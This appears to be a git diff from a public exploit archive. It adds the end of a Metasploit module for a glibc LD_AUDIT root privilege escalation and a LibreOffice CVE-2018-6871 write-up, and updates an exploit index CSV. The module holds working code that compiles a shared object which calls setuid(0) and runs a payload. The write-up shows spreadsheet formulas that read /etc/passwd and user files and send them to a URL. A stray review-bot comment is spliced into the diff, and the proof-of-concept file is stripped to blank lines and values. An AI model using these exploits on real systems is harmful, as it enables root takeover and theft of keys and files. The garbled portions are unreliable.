+ fail_with Failure::BadConfig, "#{suid_exe_path} is not suid"
+ else
+ fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+ end
+
+ payload_name = ".#{rand_text_alphanumeric rand(5..10)}"
+ payload_path = "#{base_dir}/#{payload_name}"
+
+ # Set target
+ uname = cmd_exec 'uname -m'
+ vprint_status "System architecture is #{uname}"
+ if target.name.eql? 'Automatic'
+ case uname
+ when 'x86_64'
+ my_target = targets[2]
+ when /x86/, /i\d86/
+ my_target = targets[1]
+ else
+ fail_with Failure::NoTarget, 'Unable to automatically select a target'
+ end
+ else
+ my_target = target
+ end
+ print_status "Using target: #{my_target.name}"
+
+ cpu = nil
+ case my_target['Arch']
+ when ARCH_X86
+ cpu = Metasm::Ia32.new
+ when ARCH_X64
+ cpu = Metasm::X86_64.new
+ else
+ fail_with Failure::NoTarget, 'Target is not compatible'
+ end
+
+ # Compile shared object
+ so_stub = %|
+ extern int setuid(int);
+ extern int setgid(int);
+ extern int system(const char *__s);
+
+ void init(void) __attribute__((constructor));
+
+ void __attribute__((constructor)) init() {
+ setuid(0);
+ setgid(0);
+ system("#{payload_path}");
+ }
+ |
+
+ begin
+ so = Metasm::ELF.compile_c(cpu, so_stub).encode_string(:lib)
+ rescue
+ print_error "Metasm encoding failed: #{$ERROR_INFO}"
+ elog "Metasm encoding failed: #{$ERROR_INFO.class} : #{$ERROR_INFO}"
+ elog "Call stack:\n#{$ERROR_INFO.backtrace.join "\n"}"
+ fail_with Failure::Unknown, 'Metasm encoding failed'
+ end
+
+ # Upload shared object
+ so_name = ".#{rand_text_alphanumeric rand(5..10)}"
+ so_path = "#{base_dir}/#{so_name}"
+ upload_and_chmodx so_path, so
+
+ # Upload exploit
+ @so_path = "#{@lib_dir}/#{so_name}.so"
+ exp = %(
+ umask 0
+ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="#{@so_path}" #{suid_exe_path} 2>/dev/null
+ umask 0022
+ cat #{so_path} > #{@so_path}
+ LD_AUDIT="#{so_name}.so" #{suid_exe_path}
+ echo > #{@so_path}
+ )
+ exp_name = ".#{rand_text_alphanumeric rand(5..10)}"
+ exp_path = "#{base_dir}/#{exp_name}"
+ upload_and_chmodx exp_path, exp
+
+ # Upload payload
+ upload_and_chmodx payload_path, generate_payload_exe
+
+ # Launch exploit
+ print_status 'Launching exploit...'
+ # The echo at the end of the command is required
+ # else the original session may die
+ output = cmd_exec "#{exp_path}& echo "
+ output.each_line { |line| vprint_status line.chomp }
+ end
+end
\ No newline at end of file
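Review bot: The file written to `@so_path` by the `exp` script is created under `umask 0` in a trusted library directory and is removed only in `on_new_session`; if the chain fails after the `PCPROFILE_OUTPUT` step but before a session exists, that root-owned world-writable file remains on the host, and `register_file_for_cleanup` is not used for it, presumably because the unprivileged session user cannot unlink entries in `@lib_dir`. The Description should state this residual explicitly, e.g. `If exploitation fails part-way, a root-owned world-writable file may be left in the system library directory and must be removed manually.` The trailing `echo > #{@so_path}` only truncates the file, so it does not change this outcome.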
diff --git a/exploits/linux/remote/44022.md b/exploits/linux/remote/44022.md
new file mode 100644
index 000000000..8e81957f0
--- /dev/null
+++ b/exploits/linux/remote/44022.md
@@ -0,0 +1,396 @@
+# Vulnerability description
+
+[CVE-2018-6871](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6871)
+
+## First part
+
+LibreOffice supports COM.MICROSOFT.WEBSERVICE function:
+
+ https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4
+
+The function is required to obtain data by URL, usually used as:
+
+ =FILTERXML(WEBSERVICE("http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric");"number(/weatherdata/forecast/time[2]/temperature/@value)")
+
+In original:
+
+ For protocols that are not supported, such as ftp: // or file: //, WEBSERVICE returns the #VALUE! error value.
+
+In LibreOffice, these restrictions are not implemented before 5.4.5/6.0.1.
+
+## Second part
+
+By default the cells are not updated, but if you specify the cell type like ~error, then the cell will be updated when you open document.
+
+# Exploitation
+
+To read file you need just:
+
+ =WEBSERVICE("/etc/passwd")
+
+This function can also be used to send a file:
+
+ =WEBSERVICE("http://localhost:6000/?q=" & WEBSERVICE("/etc/passwd"))
+
+For successful operation, you need to send the files of the current user, so you need to retrieve current user home path.
+
+ =MID(WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")) + 5, SEARCH(CHAR(0), WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")))-FIND("USER=",
+
+Also you can parse other files too, like a ~/.ssh/config or something like that.
+
+For other than LibreOffice Calc formats you just need embed calc object to other document (I checked it works).
+
+# Impact
+
+It is easy to send any files with keys, passwords and anything else. 100% success rate, absolutely silent, affect LibreOffice prior to 5.4.5/6.0.1 in all operation systems (GNU/Linux, MS Windows, macOS etc.) and may be embedded in almost all formats supporting by LO.
+
+# Acknowledgment
+
+Vulnerability was independently found by me (@jollheef) and Ronnie Goodrich && Andrew Krasichkov (according to LibreOffice team notes).
+
+ - - -
+
+# poc.fods
+
+```
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Proof-of-concept: send private keys (this cells of course must be moved and set color to white)
+
+
+
+
+
+
+
+
+
+ Current user:
+
+
+ #VALUE!
+
+
+ 689
+
+
+ 676
+
+
+ #VALUE!
+
+
+ (change this)Address:
+
+
+ http://localhost:8080
+
+
+
+
+
+ List of private keys:
+
+
+
+
+ #VALUE!
+
+
+
+ Send:
+
+
+
+
+
+
+ 0 (default path)
+
+
+
+
+
+
+ #VALUE!
+
+
+
+
+
+ 1
+
+
+
+
+
+ 132
+
+
+ 109
+
+
+ 96
+
+
+
+ #VALUE!
+
+
+
+
+
+ 2
+
+
+
+
+
+ 297
+
+
+ 259
+
+
+ 246
+
+
+
+ #VALUE!
+
+
+
+
+
+ 3
+
+
+
+
+
+ 436
+
+
+ 409
+
+
+ 396
+
+
+
+ #VALUE!
+
+
+
+
+
+ 4
+
+
+
+
+
+ 586
+
+
+ 563
+
+
+ 550
+
+
+
+ #VALUE!
+
+
+
+
+
+ 5
+
+
+
+
+
+ 718
+
+
+ 695
+
+
+ 682
+
+
+
+ #VALUE!
+
+
+
+
+
+ 6
+
+
+
+
+
+ 882
+
+
+ 860
+
+
+ 847
+
+
+
+ #VALUE!
+
+
+
+
+
+ 7
+
+
+
+
+
+ 1267
+
+
+ 1240
+
+
+ 1227
+
+
+
+ #VALUE!
+
+
+
+
+
+ 8
+
+
+
+
+
+ 1408
+
+
+ 1383
+
+
+ 1370
+
+
+
+ #VALUE!
+
+
+
+
+
+ 9
+
+
+
+
+
+ #VALUE!
+
+
+ #VALUE!
+
+
+ #VALUE!
+
+
+
+ #VALUE!
+
+
+
+
+
+
+
+```
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index ab2480fdb..4bc031f83 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -9321,6 +9321,9 @@ id,file,description,date,author,type,platform,port
43979,exploits/linux/local/43979.py,"BOCHS 2.6-5 - Local Buffer Overflow",2018-02-05,"Juan Sacco",local,linux,
43987,exploits/windows/local/43987.c,"MalwareFox AntiMalware 2.74.0.150 - Privilege Escalation",2018-02-07,"Souhail Hammou",local,windows,
44006,exploits/multiple/local/44006.html,"Marked2 - Local File Disclosure",2018-02-06,"Corben Leo",local,multiple,
+44023,exploits/linux/local/44023.rb,"Juju-run Agent - Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux,
+44024,exploits/linux/local/44024.rb,"glibc - '$ORIGIN' Expansion Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux,
+44025,exploits/linux/local/44025.rb,"glibc - 'LD_AUDIT' Arbitrary DSO Load Privilege Escalation (Metasploit)",2018-02-12,Metasploit,local,linux,
41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@@ -16009,6 +16012,7 @@ id,file,description,date,author,type,platform,port
44004,exploits/hardware/remote/44004.py,"HiSilicon DVR Devices - Remote Code Execution",2017-09-07,"Istvan Toth",remote,hardware,
44005,exploits/multiple/remote/44005.py,"HPE iLO 4 < 2.53 - Add New Administrator User",2018-02-05,skelsec,remote,multiple,
44009,exploits/multiple/remote/44009.c,"JBoss 4.2.x/4.3.x - Information Disclosure",2018-02-10,JameelNabbo,remote,multiple,
+44022,exploits/linux/remote/44022.md,"LibreOffice < 6.0.1 - '=WEBSERVICE' Remote Arbitrary File Disclosure",2018-02-10,"Mikhail Klementev",remote,linux,
41666,exploits/windows/remote/41666.py,"Disk Sorter Enterprise 9.5.12 - 'GET' Remote Buffer Overflow (SEH)",2017-03-22,"Daniel Teixeira",remote,windows,
41672,exploits/windows/remote/41672.rb,"SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit)",2017-02-28,Metasploit,remote,windows,
41679,exploits/linux/remote/41679.rb,"Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)",2015-04-01,Metasploit,remote,linux,22
@@ -38025,6 +38029,9 @@ id,file,description,date,author,type,platform,port
44016,exploits/php/webapps/44016.txt,"Multi Language Olx Clone Script - Cross-Site Scripting",2018-02-10,"Varun Bagaria",webapps,php,
44017,exploits/php/webapps/44017.txt,"Paypal Clone Script 1.0.9 - 'id' / 'acctype' SQL Injection",2018-02-11,L0RD,webapps,php,
44018,exploits/php/webapps/44018.txt,"Readymade Video Sharing Script 3.2 - 'search' SQL Injection",2018-02-11,"Varun Bagaria",webapps,php,
+44019,exploits/java/webapps/44019.txt,"LogicalDOC Enterprise 7.7.4 - Directory Traversal",2018-02-12,LiquidWorm,webapps,java,
+44020,exploits/java/webapps/44020.txt,"LogicalDOC Enterprise 7.7.4 - User Enumeration",2018-02-12,LiquidWorm,webapps,java,
+44021,exploits/java/webapps/44021.txt,"LogicalDOC Enterprise 7.7.4 - Root Remote Code Execution",2018-02-12,LiquidWorm,webapps,java,
41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80